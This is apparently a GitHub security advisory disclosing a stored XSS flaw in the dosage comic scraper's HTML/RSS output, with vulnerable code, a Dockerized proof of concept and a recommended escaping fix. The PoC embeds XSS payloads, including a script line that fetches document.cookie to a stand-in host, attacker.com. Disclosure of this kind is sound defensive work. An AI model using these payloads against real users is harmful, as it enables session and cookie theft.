MEDIUM 6.1

GHSA-75mw-h36v-2jv7

Dosage Vulnerable to Stored Cross-Site Scripting (XSS) in HTML/RSS Output Handlers


## Summary

The HTML and RSS output handlers in `dosagelib/events.py` write user-controlled content (comic text and page URLs) directly into generated files without proper HTML escaping. When a user scrapes a malicious webcomic and opens the generated HTML/RSS file, attacker-controlled JavaScript can execute in their browser.

**CWE**: [CWE-79](https://cwe.mitre.org/data/definitions/79.html) - Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)

---

## Details

### Vulnerable Code Locations

The vulnerability exists in `dosagelib/events.py` where untrusted content is written to HTML/RSS output without escaping:

**1. RSSEventHandler (lines 116-118)**

```python
# events.py:116-118
if comic.text:
    description += '<br/>%s' % comic.text  # ← Unescaped comic.text
description += '<br/><a href="%s">View Comic Online</a>' % pageUrl  # ← Unescaped URL
```

**2. HtmlEventHandler (lines 232, 238)**

```python
# events.py:232
self.html.write(u'<li><a href="%s">%s</a>\n' % (pageUrl, pageUrl))  # ← Unescaped URL

# events.py:238
if text:
    self.html.write(u'<br/>%s\n' % text)  # ← Unescaped text
```

### Root Cause

- `BasicScraper.fetchText()` in `scraper.py:422` calls `html.unescape()` on extracted text
- The output handlers never call `html.escape()` before writing to files
- No sanitization of URLs or text content occurs anywhere in the output pipeline
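The interaction between the first two points can be illustrated with the standard library alone. The following is a minimal sketch, not code from dosage: the `scraped` string is a hypothetical stand-in for text extracted from a comic page, and the format string only mirrors the shape of the handler output quoted above.

```python
import html

# Hypothetical text as it might appear, entity-encoded, in a page's markup.
scraped = "Funny!&lt;script&gt;alert(1)&lt;/script&gt;"

# html.unescape() turns the entities back into live markup characters.
unescaped = html.unescape(scraped)

# Plain string formatting without escaping produces an active <script> tag.
unsafe_fragment = '<br/>%s\n' % unescaped

# Escaping at output time turns the markup characters back into inert entities.
safe_fragment = '<br/>%s\n' % html.escape(unescaped)

print(unsafe_fragment, end="")
print(safe_fragment, end="")
```

The point of the sketch is that unescaping on input is harmless by itself; the problem arises only because nothing re-escapes the value at the point where it is written into markup.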

### Data Flow

```
Malicious webcomic page
    ↓
textSearch XPath extracts content (e.g., img/@title, div text)
    ↓
BasicScraper.fetchText() calls html.unescape()
    ↓
comic.text stored without sanitization
    ↓
HtmlEventHandler/RSSEventHandler writes to file without html.escape()
    ↓
Generated HTML/RSS contains executable JavaScript
```

---

## PoC

I created a proof-of-concept that demonstrates the vulnerability by simulating a malicious comic source.

### Prerequisites

- Docker installed and running

### PoC Files

Create these files in a `poc/` directory:

**1. `poc/Dockerfile`**

```dockerfile
FROM python:3.11-slim

LABEL description="PoC for dosage Stored XSS vulnerability (CWE-79)"

WORKDIR /app
COPY . /app

# Install dependencies
RUN pip install --no-cache-dir --quiet imagesize lxml requests rich platformdirs

# Install dosage
ENV SETUPTOOLS_SCM_PRETEND_VERSION_FOR_DOSAGE=0.0.0
RUN pip install --no-cache-dir --quiet .

CMD ["python", "poc/poc.py"]
```

**2. `poc/poc.py`**

```python
#!/usr/bin/env python3
"""
PoC: Stored XSS in dosage HTML/RSS Output Handlers
Demonstrates that untrusted comic content is written to output files unescaped.
"""

import sys
from pathlib import Path
from types import SimpleNamespace

from dosagelib.events import HtmlEventHandler, RSSEventHandler

# XSS payloads simulating malicious webcomic content
MALICIOUS_TEXT = "Funny Comic!<script>fetch('http://attacker.com/?c='+document.cookie)</script>"
MALICIOUS_URL = "javascript:alert('XSS-via-URL')"


def check_vulnerability(content: str, marker: str, description: str) -> bool:
    """Check if unescaped marker appears in content."""
    if marker.lower() in content.lower():
        print(f" [VULNERABLE] {description}")
        print(f" Found unescaped: {marker}")
        return True
    print(f" [SAFE] {description}")
    return False


def main():
    print("=" * 70)
    print("PoC: Stored XSS in dosage HTML/RSS Output Handlers")
    print("=" * 70)
    print()

    base = Path(__file__).parent / "output"
    base.mkdir(parents=True, exist_ok=True)

    # Create dummy image file
    img_path = base / "payload.png"
    img_path.write_bytes(b"\x89PNG\r\n\x1a\n")

    # Simulate comic with malicious content
    comic = SimpleNamespace(
        scraper=SimpleNamespace(name="MaliciousComic"),
        referrer=MALICIOUS_URL,
        text=MALICIOUS_TEXT,
        url="http://example.com/comic.png"
    )

    vulnerabilities_found = 0

    # Test RSS Handler
    print("[*] Testing RSSEventHandler...")
    rss_handler = RSSEventHandler(str(base), None, False)
    rss_handler.start()
    rss_handler.comicDownloaded(comic, str(img_path))
    rss_handler.end()
    rss_path = Path(rss_handler.rssfn)
    rss_content = rss_path.read_text(encoding="utf-8")
    print(f" Output file: {rss_path}")
    if check_vulnerability(rss_content, "javascript:", "pageUrl in RSS href"):
        vulnerabilities_found += 1

    # Test HTML Handler
    print()
    print("[*] Testing HtmlEventHandler...")
    html_handler = HtmlEventHandler(str(base), None, False)
    html_handler.start()
    html_path = Path(html_handler.html.name)
    html_handler.comicDownloaded(comic, str(img_path), text=MALICIOUS_TEXT)
    html_handler.end()

    html_content = html_path.read_text(encoding="utf-8")
    print(f" Output file: {html_path}")
    if check_vulnerability(html_content, "<script>", "text param in HTML"):
        vulnerabilities_found += 1
    if check_vulnerability(html_content, "javascript:", "pageUrl in HTML link"):
        vulnerabilities_found += 1

    # Show vulnerable content
    print()
    print("-" * 70)
    print("Vulnerable Content in Generated HTML:")
    print("-" * 70)
    for line in html_content.splitlines():
        if "<script>" in line.lower() or "javascript:" in line.lower():
            print(f" {line}")

    print()
    print("=" * 70)
    print(f"RESULT: {vulnerabilities_found} XSS vulnerability vectors confirmed!")
    print("=" * 70)
    return 0 if vulnerabilities_found > 0 else 1


if __name__ == "__main__":
    sys.exit(main())
```

**3. `poc/run_poc.sh`**

```bash
#!/usr/bin/env bash
set -euo pipefail

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
ROOT_DIR="$(cd "${SCRIPT_DIR}/.." && pwd)"

echo "[*] Building PoC Docker image..."
docker build -t dosage-xss-poc -f "${SCRIPT_DIR}/Dockerfile" "${ROOT_DIR}" --quiet

echo "[*] Running PoC..."
docker run --rm dosage-xss-poc

echo "[*] Cleanup: docker rmi dosage-xss-poc"
```

### Running the PoC

```bash
cd /path/to/dosage
chmod +x poc/run_poc.sh
./poc/run_poc.sh
```

### PoC Output

```
======================================================================
PoC: Stored XSS in dosage HTML/RSS Output Handlers
======================================================================

[*] Testing RSSEventHandler...
 Output file: /app/poc/output/dailydose.rss
 [VULNERABLE] pageUrl in RSS href
 Found unescaped: javascript:

[*] Testing HtmlEventHandler...
 Output file: /app/poc/output/html/comics-20251210.html
 [VULNERABLE] text param in HTML
 Found unescaped: <script>
 [VULNERABLE] pageUrl in HTML link
 Found unescaped: javascript:

----------------------------------------------------------------------
Vulnerable Content in Generated HTML:
----------------------------------------------------------------------
 <li><a href="javascript:alert('XSS-via-URL')">javascript:alert('XSS-via-URL')</a>
 <br/>Funny Comic!<script>fetch('http://attacker.com/?c='+document.cookie)</script>

======================================================================
RESULT: 3 XSS vulnerability vectors confirmed!
======================================================================
```

The output shows that:

1. The `javascript:` URL is written directly into `<a href>` attributes
2. The `<script>` tag from comic text appears unescaped in the HTML body

---

## Impact

### Who is affected?

- Users who use `dosage --output html` or `dosage --output rss` options
- Anyone who opens the generated HTML/RSS files in a browser

### Attack scenario

1. Attacker creates or compromises a webcomic site
2. Attacker injects JavaScript into image title/alt attributes:
   ```html
   <img src="comic.png" title="Funny!<script>alert(1)</script>">
   ```
3. Victim runs: `dosage MaliciousComic --output html`
4. The generated `Comics/html/comics-YYYYMMDD.html` contains the unescaped script
5. When victim opens the file, JavaScript executes
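The injection step in this scenario relies on the fact that a quoted attribute value may carry markup characters, and an extractor hands them back verbatim. The sketch below illustrates this with the standard-library `html.parser` module as a stand-in for dosage's XPath-based extraction; the `TitleCollector` class is hypothetical and exists only for this illustration.

```python
import html
from html.parser import HTMLParser


class TitleCollector(HTMLParser):
    """Hypothetical helper: collects the title attribute of every <img> tag."""

    def __init__(self):
        super().__init__()
        self.titles = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "title" and value is not None:
                    self.titles.append(value)


# The attacker-controlled markup from the injection step above.
page = '<img src="comic.png" title="Funny!<script>alert(1)</script>">'

collector = TitleCollector()
collector.feed(page)
title = collector.titles[0]

# Written as-is, the extracted title becomes a live <script> element.
unsafe_line = '<br/>%s\n' % title
# Escaped at output time, it is rendered as harmless text.
safe_line = '<br/>%s\n' % html.escape(title)

print(unsafe_line, end="")
print(safe_line, end="")
```

The attribute value is inert while it sits inside the `title` attribute on the source page; it only becomes executable once it is copied into element content without escaping.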

### Potential consequences

- **Cookie theft** if files are served over HTTP
- **Local file access** via `file://` protocol
- **Phishing attacks** through DOM manipulation

---

## Recommended Fix

Escape all user-controlled content before writing to HTML/RSS:

```python
import html

# In RSSEventHandler.comicDownloaded() - events.py around line 116:
if comic.text:
    description += '<br/>%s' % html.escape(comic.text)
description += '<br/><a href="%s">View Comic Online</a>' % html.escape(pageUrl)

# In HtmlEventHandler.comicDownloaded() - events.py around line 232:
self.html.write(u'<li><a href="%s">%s</a>\n' % (html.escape(pageUrl), html.escape(pageUrl)))

# events.py around line 238:
if text:
    self.html.write(u'<br/>%s\n' % html.escape(text))
```

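Escaping alone does not neutralize `javascript:` URLs: `html.escape()` leaves the scheme untouched, and the browser decodes any escaped quotes before it evaluates the `href`. URLs should therefore also be validated against an allowlist of safe schemes (`http`, `https`) before they are written into `href` attributes.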
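A scheme check of this kind could be sketched as follows. This is an illustration under stated assumptions rather than the fix shipped in dosage: the helper name `safe_href`, the `ALLOWED_SCHEMES` set, and the choice of `#` as a fallback are all hypothetical.

```python
import html
from urllib.parse import urlsplit

# Assumption: only absolute web links are expected in the generated output.
ALLOWED_SCHEMES = {"http", "https"}


def safe_href(url: str) -> str:
    """Return an attribute-safe URL, or '#' if the scheme is not allowlisted."""
    candidate = url.strip()
    try:
        scheme = urlsplit(candidate).scheme.lower()
    except ValueError:
        # urlsplit() raises ValueError on some malformed URLs; treat as unsafe.
        return "#"
    if scheme not in ALLOWED_SCHEMES:
        return "#"
    # Escape &, <, > and quotes so the value cannot break out of the attribute.
    return html.escape(candidate, quote=True)


print(safe_href("javascript:alert('XSS-via-URL')"))
print(safe_href("https://example.com/?a=1&b=2"))
```

An allowlist is used instead of a blocklist so that unexpected schemes such as `data:` or `vbscript:` are rejected by default. Note that this sketch also rejects relative URLs, which have an empty scheme.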

---

## Resources

- [CWE-79: Cross-site Scripting (XSS)](https://cwe.mitre.org/data/definitions/79.html)
- [OWASP XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
- [Python html.escape() documentation](https://docs.python.org/3/library/html.html#html.escape)

---


## Affected Packages

PyPI / dosage

- First affected version: 0
- Fixed version: 3.3

To fix, upgrade: `pip install --upgrade 'dosage>=3.3'`
